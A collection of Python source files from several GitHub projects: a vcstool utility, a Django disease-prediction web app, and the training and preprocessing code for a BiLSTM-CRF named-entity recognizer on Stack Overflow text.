def join_args(self, separator=" "):
return separator.join(self.args)
def join_options(self, separator=" "):
return separator.join(self.options)
@classmethod
def consume(cls, args, default_args=None, default_options=None):
args_ = []
options_ = []
for arg in args:
if arg.startswith("-"):
options_.append(arg)
else:
args_.append(arg)
if not args_:
args_ = default_args
if not options_:
options_ = default_options
return cls(args_, options_)
```
|
{
"source": "jenisys/vcstool",
"score": 2
}
|
#### File: vcstool/vcstool/util.py
```python
from errno import EACCES, EPERM
import os
from shutil import rmtree as shutil_rmtree
import stat
import sys
def rmtree(path):
kwargs = {}
if sys.platform == 'win32':
kwargs['onerror'] = _onerror_windows
return shutil_rmtree(path, **kwargs)
def _onerror_windows(function, path, excinfo):
if isinstance(excinfo[1], OSError) and excinfo[1].errno in (EACCES, EPERM):
os.chmod(path, stat.S_IWRITE)
function(path)
```
|
{
"source": "jenith-hue/Lung_Cancer",
"score": 2
}
|
#### File: Lung_Cancer/autism/models.py
```python
from django.contrib import admin
from django.db import models
from datetime import date
class predict(models.Model):
type1 = models.CharField(max_length=200, blank=False)
type2 = models.CharField(max_length=200, blank=False)
type3 = models.CharField(max_length=200, blank=False)
type4 = models.CharField(max_length=200, blank=False)
type5 = models.CharField(max_length=200, blank=False)
type6 = models.CharField(max_length=200, blank=False)
type7 = models.CharField(max_length=200, blank=False)
type8 = models.CharField(max_length=200, blank=False)
class Meta:
abstract = True
def __str__(self):
return 'Type: {0} for date: {1}'.format(self.type1)
```
#### File: Lung_Cancer/autism/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponseRedirect
from .forms import Predict
from .ML_ALGORITHM import you
import numpy
def index(request):
return render(request, 'autism/home.html')
def predict(request):
return render(request, 'autism/predict.html')
def predicted(request):
if request.method == "POST":
form = Predict(request.POST)
type1 = int(request.POST['type1'])
type2 = int(request.POST['type2'])
type3 = int(request.POST['type3'])
type4 = int(request.POST['type4'])
type5 = int(request.POST['type5'])
type6 = float(request.POST['type6'])
type7 = float(request.POST['type7'])
type8 = int(request.POST['type8'])
x= []
new_list = []
x.append(type1)
x.append(type2)
x.append(type3)
x.append(type4)
x.append(type5)
x.append(type6)
x.append(type7)
x.append(type8)
list = you.getPrediction(x)
yes = list[0]
no = 100-list[0]
new_list.append(yes)
new_list.append(no)
label = ['yes','no']
zipped_list = zip(list)
context = {
'zipped_list': zipped_list,
'list': new_list,
'label': label,
}
print(list)
return render(request, 'autism/predicted.html',context)
else:
form = Predict()
return render(request,'autism/predicted.html',{'form':form})
def restapi(request):
type1 = request.GET.get('value1', -1)
type2 = request.GET.get('value2', -1)
type3 = request.GET.get('value3', -1)
type4 = request.GET.get('value4', -1)
type5 = request.GET.get('value5', -1)
type6 = request.GET.get('value6', -1)
type7 = request.GET.get('value7', -1)
type8 = request.GET.get('value8', -1)
x= []
new_list = []
x.append(type1)
x.append(type2)
x.append(type3)
x.append(type4)
x.append(type5)
x.append(type6)
x.append(type7)
x.append(type8)
list = you.getPrediction(x)
yes = list[0]
no = 100-list[0]
new_list.append(yes)
new_list.append(no)
label = ['yes','no']
zipped_list = zip(list)
context = {
'zipped_list': zipped_list,
'list': new_list,
'label': label,
}
print(list)
return render(request, 'autism/predicted.html',context)
```
|
{
"source": "jeniyat/Bert-OverFlow",
"score": 2
}
|
#### File: code/Attentive_BiLSTM/HAN.py
```python
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
from utils_so import *
from config_so import parameters
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
class Embeeding_Attn(nn.Module):
def __init__(self):
super(Embeeding_Attn, self).__init__()
self.max_len = 3
self.input_dim = 1824
self.hidden_dim = 150
self.bidirectional = True
self.drop_out_rate = 0.5
self.context_vector_size = [parameters['embedding_context_vecotr_size'], 1]
self.drop = nn.Dropout(p=self.drop_out_rate)
self.word_GRU = nn.GRU(input_size=self.input_dim,
hidden_size=self.hidden_dim,
bidirectional=self.bidirectional,
batch_first=True)
self.w_proj = nn.Linear(in_features=2*self.hidden_dim ,out_features=2*self.hidden_dim)
self.w_context_vector = nn.Parameter(torch.randn(self.context_vector_size).float())
self.softmax = nn.Softmax(dim=1)
init_gru(self.word_GRU)
def forward(self,x):
x, _ = self.word_GRU(x)
Hw = torch.tanh(self.w_proj(x))
w_score = self.softmax(Hw.matmul(self.w_context_vector))
x = x.mul(w_score)
x = torch.sum(x, dim=1)
return x
class Word_Attn(nn.Module):
def __init__(self):
super(Word_Attn, self).__init__()
self.max_len = 92
self.input_dim = 300
self.hidden_dim = 150
self.bidirectional = True
self.drop_out_rate = 0.5
self.context_vector_size = [parameters['word_context_vecotr_size'] , 1]
self.drop = nn.Dropout(p=self.drop_out_rate)
self.word_GRU = nn.GRU(input_size=self.input_dim,
hidden_size=self.hidden_dim,
bidirectional=self.bidirectional,
batch_first=True)
self.w_proj = nn.Linear(in_features=2*self.hidden_dim ,out_features=2*self.hidden_dim)
self.w_context_vector = nn.Parameter(torch.randn(self.context_vector_size).float())
self.softmax = nn.Softmax(dim=1)
init_gru(self.word_GRU)
def forward(self,x):
x, _ = self.word_GRU(x)
Hw = torch.tanh(self.w_proj(x))
w_score = self.softmax(Hw.matmul(self.w_context_vector))
x = x.mul(w_score)
# print(x.size())
return x
```
#### File: code/Attentive_BiLSTM/train_so.py
```python
from __future__ import print_function
import optparse
import itertools
from collections import OrderedDict
import torch
import time
import pickle
from torch.optim import lr_scheduler
from torch.autograd import Variable
# import matplotlib.pyplot as plt #JT: commented it
import sys
import os
import json
import numpy as np
import codecs
# import Visdom #JT: commented it
# from utils import *
# from loader import *
# from config import opts
# from model_wo_char import BiLSTM_CRF
from model import BiLSTM_CRF
import utils_so as utils #JT: utils for SO
import loader_so as loader #JT: loader for SO
from config_so import parameters
from config_so import opts
from utils_so import Sort_Entity_by_Count
import shutil
# from evaluate_so import evaluating
# sys.path.append('../../utility/')
import print_result
import conlleval_py
import tolatex
import time
from Word_Freqency_Mapper import Word_Freqency_Mapper
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
np.random.seed(parameters["seed"])
assert os.path.isfile(parameters["train"])
assert os.path.isfile(parameters["dev"])
assert os.path.isfile(parameters["test"])
assert parameters['char_dim'] > 0 or parameters['word_dim'] > 0
assert 0. <= parameters['dropout'] < 1.0
assert parameters['tag_scheme'] in ['iob', 'iobes']
assert not parameters['all_emb'] or parameters['pre_emb']
assert not parameters['pre_emb'] or parameters['word_dim'] > 0
# assert not parameters['pre_emb'] or os.path.isfile(parameters['pre_emb'])
def create_frequecny_vector():
# print("***********",parameters["freq_mapper_bin_count"], type(parameters["freq_mapper_bin_count"]))
freq_mapper = Word_Freqency_Mapper(bins=parameters["freq_mapper_bin_count"],w=parameters["freq_mapper_bin_width"])
freq_mapper = Word_Freqency_Mapper()
freq_mapper.Find_Train_Data_Freq(parameters["train"])
freq_mapper.Read_Dev_Data(parameters["dev"])
freq_mapper.Read_Test_Data(parameters["test"])
freq_mapper.Find_Gaussian_Bining_For_Training_Data_Freq()
freq_mapper.Find_Freq_Vector_for_words()
freq_mapper.Write_Freq_To_File(parameters['freq_vector_file'])
def save_char_embed(sentence_words, char_embed_dict, char_embed_vectors):
# print(sentence_words)
# print(char_embed_dict)
# print(char_embed_vectors)
for sent_iter in range(len(sentence_words)):
word = sentence_words[sent_iter]
word_char_vector = char_embed_vectors[sent_iter]
char_embed_dict[word]=word_char_vector
# print(word, word_char_vector)
return char_embed_dict
def read_ctc_pred_file():
ctc_pred_dict = {}
for line in open(parameters["ctc_pred"]):
if line.strip()=="":
continue
line_values= line.strip().split("\t")
word, ctc_pred = line_values[0], line_values[-1]
# print(word, ctc_pred)
ctc_pred_dict[word]=ctc_pred
return ctc_pred_dict
def prepare_train_set_dev_data():
lower = parameters['lower']
zeros = parameters['zeros']
tag_scheme = parameters['tag_scheme']
#------------------------------------------------------------------
#------------- create the frequency vector-------------------------
#------------------------------------------------------------------
if parameters['use_freq_vector']:
create_frequecny_vector()
# print("completed frequency vector creation")
#------------------------------------------------------------------
#------------- create the ctc_dict-------------------------
#------------------------------------------------------------------
ctc_pred_dict = read_ctc_pred_file()
print("completed ctc predictions reading ")
#------------------------------------------------------------------
#------------- prepare the training data --------------------------
#------------- merge labels and select category specific entities -
#------------------------------------------------------------------
input_train_file=utils.Merge_Label(parameters["train"])
Sort_Entity_by_Count(input_train_file,parameters["sorted_entity_list_file_name"])
with open(parameters["sorted_entity_list_file_name"]) as f:
sorted_entity_list = json.load(f)
set_of_selected_tags=[]
entity_category_code=parameters["entity_category_code"]
entity_category_human_language=parameters["entity_category_human_language"]
set_of_selected_tags.extend(sorted_entity_list[0:-6])
if parameters['entity_category']=='code':
for entity in entity_category_human_language:
if entity in entity_category_human_language and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if parameters['entity_category']=='human_lang':
for entity in entity_category_code:
if entity in entity_category_code and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
if parameters['entity_category']=='all':
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
print("set of entities: ", set_of_selected_tags)
merge_tags=parameters['merge_tags']
train_sentences = loader.load_sentences_so_w_pred(parameters["train"], parameters["train_pred"], lower, zeros,merge_tags, set_of_selected_tags)
if parameters["mode"]=="dev":
dev_sentences = loader.load_sentences_so_w_pred(parameters["dev"], parameters["dev_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
elif parameters["mode"]=="test":
dev_sentences = loader.load_sentences_so_w_pred(parameters["test"], parameters["test_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
# test_sentences = loader.load_sentences_so(parameters["test"], lower, zeros,merge_tags, set_of_selected_tags)
loader.update_tag_scheme(train_sentences, tag_scheme)
loader.update_tag_scheme(dev_sentences, tag_scheme)
loader.update_tag_scheme(test_sentences, tag_scheme)
dico_words_train = loader.word_mapping(train_sentences, lower)[0]
dico_chars, char_to_id, id_to_char = loader.char_mapping(train_sentences)
dico_tags, tag_to_id, id_to_tag = loader.tag_mapping(train_sentences)
# print(tag_to_id)
#------------------------------------------------------------------------------------------------------------
#------------- based on parameters setting(should be set by command line argutments) ------------------------
#------------- load pretrained word embeddings --------------------------------------------------------------
#------------------------------------------------------------------------------------------------------------
if parameters['all_emb']:
all_dev_test_words=[w[0][0] for w in dev_sentences+test_sentences]
else:
all_dev_test_words = []
if parameters['use_pre_emb']:
dico_words, word_to_id, id_to_word = loader.augment_with_pretrained(
dico_words_train.copy(),
parameters['pre_emb'],
all_dev_test_words
)
else:
dico_words = dico_words_train
word_to_id, id_to_word = loader.create_mapping(dico_words_train.copy())
train_data = loader.prepare_dataset(train_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
dev_data = loader.prepare_dataset(dev_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
test_data = loader.prepare_dataset(test_sentences, word_to_id, char_to_id, tag_to_id,ctc_pred_dict, lower)
all_freq_embed={}
for line in open(parameters['freq_vector_file']):
# print(line)
s = line.strip().split()
if len(s) == parameters['freq_dim'] + 1:
all_freq_embed[s[0]] = np.array([float(i) for i in s[1:]])
else:
print("freq dim mismatch: ","required: ", parameters['freq_dim'], "given: ",len(s)-1)
# print(all_freq_embed)
freq_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['freq_dim']))
for w in word_to_id:
if w in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w]
elif w.lower() in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w.lower()]
# print("done loading freq embeds")
all_word_embeds = {}
if parameters['use_pre_emb']:
for i, line in enumerate(codecs.open(parameters['pre_emb'] , 'r', 'utf-8')):
# print(line)
s = line.strip().split()
if len(s) == parameters['word_dim'] + 1:
all_word_embeds[s[0]] = np.array([float(i) for i in s[1:]])
word_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['word_dim']))
seg_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['segmentation_count'] , parameters['segmentation_dim']))
ctc_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_recognizer_count'], parameters['code_recognizer_dim']))
# code_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_pred_count'], parameters['code_pred_dim']))
if parameters['use_pre_emb']:
for w in word_to_id:
if w in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w]
elif w.lower() in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w.lower()]
# print('Loaded %i pretrained embeddings.' % len(all_word_embeds))
# print('Loaded %i pretrained freq embeddings.' % len(all_freq_embed))
# freq_combined_word_vec=np.hstack((word_embeds,freq_embeds))
# word_embeds=freq_combined_word_vec
# mapping_file = parameters["models_path"]+'/mapping.pkl'
# with open(mapping_file, 'wb') as f:
# mappings = {
# 'word_to_id': word_to_id,
# 'id_to_word': id_to_word,
# 'tag_to_id': tag_to_id,
# 'char_to_id': char_to_id,
# 'id_to_char': id_to_char,
# 'parameters': parameters,
# 'word_embeds': word_embeds,
# 'freq_embeds': freq_embeds,
# 'seg_pred_embeds': ctc_pred_embeds
# }
# pickle.dump(mappings, f, protocol=4)
return train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds
# vis = visdom.Visdom() #JT: no need of visualization for now
# sys.stdout.flush()
def evaluating(model, datas, best_F, epoch_count, phase_name):
fout_per_epoch = open(parameters["perf_per_epoch_file"],'a')
print("-----------------------------------")
print("now evaluating: ",phase_name)
print("-----------------------------------")
prediction = []
save = False
new_F = 0.0
confusion_matrix = torch.zeros((len(tag_to_id) - 2, len(tag_to_id) - 2))
iter_count=0
for data in datas:
ground_truth_id = data['tags']
words = data['str_words']
chars2 = data['chars']
caps = data['caps']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
dwords = Variable(torch.LongTensor(data['words']))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
dcaps = Variable(torch.LongTensor(caps))
if use_gpu:
val, out = model(words, dwords.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), chars2_mask.cuda(), dcaps.cuda(), chars2_length, d)
else:
val, out = model(words, dwords, sentence_seg_preds, sentence_ctc_preds, chars2_mask, dcaps, chars2_length, d)
predicted_id = out
for (word, true_id, pred_id) in zip(words, ground_truth_id, predicted_id):
line = ' '.join([word, id_to_tag[true_id], id_to_tag[pred_id]])
prediction.append(line)
confusion_matrix[true_id, pred_id] += 1
prediction.append('')
predf = parameters["eval_temp"] + '/pred.' + phase_name +"_"+str(epoch_count)
scoref = parameters["eval_temp"] + '/score.' + phase_name+"_"+str(epoch_count)
with open(predf, 'w') as f:
f.write('\n'.join(prediction))
eval_result = conlleval_py.evaluate_conll_file(inputFile=predf)
os.system('%s < %s > %s' % (eval_script, predf, scoref))
eval_lines = [l.rstrip() for l in codecs.open(scoref, 'r', 'utf8')]
for i, line in enumerate(eval_lines):
print(line)
if i == 1:
new_F = float(line.strip().split()[-1])
if new_F > best_F:
best_F = new_F
save = True
print('the best F is ', new_F)
#-------------------------------------------------------------------------------------------------
#--------------- only print the performnace on dev/test set. do not print for train set ----------
#-------------------------------------------------------------------------------------------------
if phase_name=="dev" or phase_name=="test":
print_result.print_result(eval_result, epoch_count, parameters["sorted_entity_list_file_name"], parameters["entity_category_code"], parameters["entity_category_human_language"])
print("-----------------------------------")
over_all_p=eval_result['overall']['P']
over_all_r=eval_result['overall']['R']
over_all_f1=eval_result['overall']['F1']
op_line = phase_name+ ": epoch: "+str(epoch_count) +" P: "+ str(over_all_p)+" R: "+str(over_all_r)+" F1: "+str(over_all_f1)+"\n"
fout_per_epoch.write(op_line)
fout_per_epoch.flush()
return best_F, new_F, save
def train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data):
char_embed_dict = {}
losses = []
loss = 0.0
best_dev_F = -1.0
best_test_F = -1.0
best_train_F = -1.0
all_F = [[0, 0, 0]]
plot_every = 10
eval_every = 20
count = 0
model.train(True)
start = time.time()
for epoch in range(1, parameters["epochs"]+1):
print("---------epoch count: ", epoch)
for i, index in enumerate(np.random.permutation(len(train_data))):
tr = time.time()
count += 1
data = train_data[index]
# print("from train_so: ",data)
#what is the data instance looks like"
#'str_words': ['Trial', 'and', 'error', 'seems', 'a', 'very', 'dumb', '(', 'and', 'annoying', ')', 'approach', 'to', 'solve', 'this', 'problem', '.'],
#'words': [1, 9, 76, 179, 7, 215, 1, 26, 9, 1, 29, 332, 4, 310, 15, 64, 3],
#'markdown': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'chars': [[26, 8, 5, 4, 10], [4, 6, 11], [1, 8, 8, 3, 8], [7, 1, 1, 14, 7], [4], [22, 1, 8, 17], [11, 13, 14, 21], [35], [4, 6, 11], [4, 6, 6, 3, 17, 5, 6, 16], [34], [4, 15, 15, 8, 3, 4, 12, 9], [2, 3], [7, 3, 10, 22, 1], [2, 9, 5, 7], [15, 8, 3, 21, 10, 1, 14], [20]],
#'caps': [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'tags': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'handcrafted': [28052, 28053, 28054, 28055, 28056, 28057, 28058, 28059, 28060, 28061, 28062, 28063, 28064, 28065, 28066, 28067, 28068]
model.zero_grad()
sentence_in = data['words']
sentence_tokens=data['str_words']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
tags = data['tags']
chars2 = data['chars']
# print(data)
sentence_in = Variable(torch.LongTensor(sentence_in))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
######### char lstm
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
# ######## char cnn
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
# print(chars2_mask)
chars2_mask = Variable(torch.LongTensor(chars2_mask))
targets = torch.LongTensor(tags)
caps = Variable(torch.LongTensor(data['caps']))
if use_gpu:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens, sentence_in.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), targets.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d)
else:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens,sentence_in,sentence_seg_preds,sentence_ctc_preds, targets, chars2_mask, caps, chars2_length, d)
# loss += neg_log_likelihood.data[0] / len(data['words'])
#JT : added the following to save char embed (for evaluating char embeds)
# if use_gpu:
# char_embed_op = model.get_char_embedding(sentence_in.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d).clone().data.cpu().numpy()
# else:
# char_embed_op = model.get_char_embedding(sentence_in, chars2_mask, caps, chars2_length, d).clone().data.cpu().numpy()
# char_embed_dict = save_char_embed( data['str_words'], char_embed_dict, char_embed_op)
# char_embed_dict_name= "char_embed_dict_"+str(epoch)+".json"
# with open(char_embed_dict_name, 'wb') as fp:
# pickle.dump(char_embed_dict, fp)
# print(char_embed_op)
loss += neg_log_likelihood.data.item() / len(data['words']) #JT : data[0]> data.item()
neg_log_likelihood.backward()
# torch.nn.utils.clip_grad_norm(model.parameters(), 5.0)
torch.nn.utils.clip_grad_norm_(model.parameters(), 5.0) #JT : clip_grad_norm > clip_grad_norm_
optimizer.step()
if count % len(train_data) == 0:
utils.adjust_learning_rate(optimizer, lr=learning_rate/(1+0.05*count/len(train_data)))
#JT: evaluate after 1 epoch
model.train(False)
best_train_F, new_train_F, _ = evaluating(model, train_data, best_train_F, epoch, "train")
if parameters["mode"]=="dev":
phase_name="dev"
else:
phase_name="test"
best_dev_F, new_dev_F, save = evaluating(model, dev_data, best_dev_F, epoch, phase_name)
if save:
torch.save(model, model_name)
best_test_F, new_test_F = 0, 0
all_F.append([new_train_F, new_dev_F, new_test_F])
step_lr_scheduler.step()
# word_embeding_weights=model.word_embeds.weight.data.cpu().numpy()
# print("type(word_embeding_weights): ", type(word_embeding_weights))
# print("shape word_embeding_weights: ", word_embeding_weights.shape)
# print("shape word_embeding_weights: ", model.word_embeds.weight.data.size())
# print("shape word_embeding_weights: ", model.word_embeds.weight.data[0])
#-------------------------------------------------------------------------------------------------
#--------------------- save model for each epoch, after finding the optimal epoch ----------------
#--------------------- save model from last epoch only -------------------------------------------
#-------------------------------------------------------------------------------------------------
PATH=parameters["models_path"]+"/model_epoch."+str(epoch)
torch.save(model, PATH)
model.train(True)
end = time.time()
time_in_this_epoch = end - start
print("time in this epoch: ", time_in_this_epoch, "secs")
start=end
return char_embed_dict
if __name__ == '__main__':
eval_script= parameters["eval_script"]
eval_temp= parameters["eval_temp"]
try:
shutil.rmtree(eval_temp)
except Exception as e:
pass
fout_per_epoch = open(parameters["perf_per_epoch_file"],'w')
fout_per_epoch.close()
if not os.path.isfile(eval_script):
raise Exception('CoNLL evaluation script not found at "%s"' % eval_script)
if not os.path.exists(eval_temp):
os.makedirs(eval_temp)
if not os.path.exists(parameters["models_path"]):
os.makedirs(parameters["models_path"])
train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds =prepare_train_set_dev_data()
use_gpu = parameters['use_gpu']
gpu_id = parameters["gpu_id"]
name = parameters['name']
model_name = parameters["models_path"] + name #get_name(parameters)
tmp_model = model_name + '.tmp'
model = BiLSTM_CRF(vocab_size=len(word_to_id),
tag_to_ix=tag_to_id,
embedding_dim=parameters['word_dim'],
freq_embed_dim=parameters['freq_dim'],
markdown_embed_dim=parameters['markdown_dim'],
seg_pred_embed_dim=parameters['segmentation_dim'],
hidden_dim=parameters['word_lstm_dim'],
use_gpu=use_gpu,
char_to_ix=char_to_id,
pre_word_embeds=word_embeds,
word_freq_embeds=freq_embeds,
word_seg_pred_embeds=seg_pred_embeds,
word_ctc_pred_embeds=ctc_pred_embeds,
use_crf=parameters['crf'],
char_mode=parameters['char_mode'],
# n_cap=4,
# cap_embedding_dim=10
)
if parameters['reload']:
model.load_state_dict(torch.load(model_name))
if use_gpu:
GPU_id=gpu_id
print("GPU ID = ", GPU_id)
torch.cuda.set_device(GPU_id)
model.cuda()
learning_rate = parameters["LR"]
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9)
step_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.8)
t = time.time()
train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data)
print("total time in training: ",time.time() - t)
try:
os.remove(parameters["sorted_entity_list_file_name"])
except Exception as e:
pass
```
#### File: BERT_NER/utils_preprocess/anntoconll.py
```python
from __future__ import print_function
import os
from glob import glob
import re
import sys
from collections import namedtuple
from io import StringIO
from os import path
import sys
from os.path import join as path_join
from os.path import dirname
from sys import path as sys_path
# assume script in brat tools/ directory, extend path to find sentencesplit.py
sys_path.append(path_join(dirname(__file__), '.'))
sys.path.append('.')
from sentencesplit import sentencebreaks_to_newlines
options = None
EMPTY_LINE_RE = re.compile(r'^\s*$')
CONLL_LINE_RE = re.compile(r'^\S+\t\d+\t\d+.')
import stokenizer #JT: Dec 6
import ftfy #JT: Feb 20
from map_text_to_char import map_text_to_char #JT: Dec 6
def argparser():
import argparse
ap = argparse.ArgumentParser(description='Convert text and standoff ' +
'annotations into CoNLL format.')
ap.add_argument('-a', '--annsuffix', default=".ann",
help='Standoff annotation file suffix (default "ann")')
ap.add_argument('-c', '--singleclass', default=None,
help='Use given single class for annotations')
ap.add_argument('-n', '--nosplit', default=True, action='store_true',
help='No sentence splitting')
ap.add_argument('-o', '--outsuffix', default="conll",
help='Suffix to add to output files (default "conll")')
ap.add_argument('-v', '--verbose', default=False, action='store_true',
help='Verbose output')
# ap.add_argument('text', metavar='TEXT', nargs='+',
# help='Text files ("-" for STDIN)')
return ap
def read_sentence(f):
"""Return lines for one sentence from the CoNLL-formatted file.
Sentences are delimited by empty lines.
"""
lines = []
for l in f:
lines.append(l)
if EMPTY_LINE_RE.match(l):
break
if not CONLL_LINE_RE.search(l):
raise FormatError(
'Line not in CoNLL format: "%s"' %
l.rstrip('\n'))
return lines
def strip_labels(lines):
"""Given CoNLL-format lines, strip the label (first TAB-separated field)
from each non-empty line.
Return list of labels and list of lines without labels. Returned
list of labels contains None for each empty line in the input.
"""
labels, stripped = [], []
labels = []
for l in lines:
if EMPTY_LINE_RE.match(l):
labels.append(None)
stripped.append(l)
else:
fields = l.split('\t')
labels.append(fields[0])
stripped.append('\t'.join(fields[1:]))
return labels, stripped
def attach_labels(labels, lines):
"""Given a list of labels and CoNLL-format lines, affix TAB-separated label
to each non-empty line.
Returns list of lines with attached labels.
"""
assert len(labels) == len(
lines), "Number of labels (%d) does not match number of lines (%d)" % (len(labels), len(lines))
attached = []
for label, line in zip(labels, lines):
empty = EMPTY_LINE_RE.match(line)
assert (label is None and empty) or (label is not None and not empty)
if empty:
attached.append(line)
else:
attached.append('%s\t%s' % (label, line))
return attached
def text_to_conll(f):
"""Convert plain text into CoNLL format."""
global options
if options.nosplit:
sentences = f.readlines()
else:
sentences = []
for l in f:
l = sentencebreaks_to_newlines(l)
sentences.extend([s for s in NEWLINE_TERM_REGEX.split(l) if s])
lines = []
offset = 0
# print(sentences)
#JT: Feb 19: added it for resolving char encoding issues
fixed_sentences = []
for s in sentences:
# print(s)
# fixed_s = ftfy.fix_text(s)
# # print(fixed_s)
# fixed_sentences.append(fixed_s)
fixed_sentences.append(s)
# for s in sentences:
for s in fixed_sentences:
nonspace_token_seen = False
# print(s)
try:
tokens = stokenizer.tokenize(s)
except stokenizer.TimedOutExc as e:
try:
print("***********using ark tokenizer")
tokens = ark_twokenize.tokenizeRawTweetText(s)
except Exception as e:
print(e)
# print("tokens: ", tokens)
token_w_pos = map_text_to_char(s, tokens, offset)
# print("token_w_pos: ",token_w_pos)
for(t, pos) in token_w_pos:
if not t.isspace():
lines.append(['O', pos, pos + len(t), t])
lines.append([])
offset+=len(s)
# tokens = [t for t in TOKENIZATION_REGEX.split(s) if t] # JT : Dec 6
# for t in tokens:
# if not t.isspace():
# lines.append(['O', offset, offset + len(t), t])
# nonspace_token_seen = True
# offset += len(t)
# # sentences delimited by empty lines
# if nonspace_token_seen:
# lines.append([])
# add labels (other than 'O') from standoff annotation if specified
if options.annsuffix:
lines = relabel(lines, get_annotations(f.name), f)
# lines = [[l[0], str(l[1]), str(l[2]), l[3]] if l else l for l in lines] #JT: Dec 6
lines = [[l[3],l[0]] if l else l for l in lines] #JT: Dec 6
return StringIO('\n'.join(('\t'.join(l) for l in lines)))
def relabel(lines, annotations, file_name):
# print("lines: ",lines)
# print("annotations", annotations)
global options
# TODO: this could be done more neatly/efficiently
offset_label = {}
for tb in annotations:
for i in range(tb.start, tb.end):
if i in offset_label:
print("Warning: overlapping annotations in ", file=sys.stderr)
offset_label[i] = tb
prev_label = None
for i, l in enumerate(lines):
if not l:
prev_label = None
continue
tag, start, end, token = l
# TODO: warn for multiple, detailed info for non-initial
label = None
for o in range(start, end):
if o in offset_label:
if o != start:
print('Warning: annotation-token boundary mismatch: "%s" --- "%s"' % (
token, offset_label[o].text), file=sys.stderr)
label = offset_label[o].type
break
if label is not None:
if label == prev_label:
tag = 'I-' + label
else:
tag = 'B-' + label
prev_label = label
lines[i] = [tag, start, end, token]
# optional single-classing
if options.singleclass:
for l in lines:
if l and l[0] != 'O':
l[0] = l[0][:2] + options.singleclass
return lines
def process_files(files, output_directory, phase_name=""):
global options
# print("phase_name: ",phase_name)
nersuite_proc = []
for fn in sorted(files):
# print("now_processing: ",fn)
with open(fn, 'rU') as f:
try:
lines = text_to_conll(f)
except:
continue
# TODO: better error handling
if lines is None:
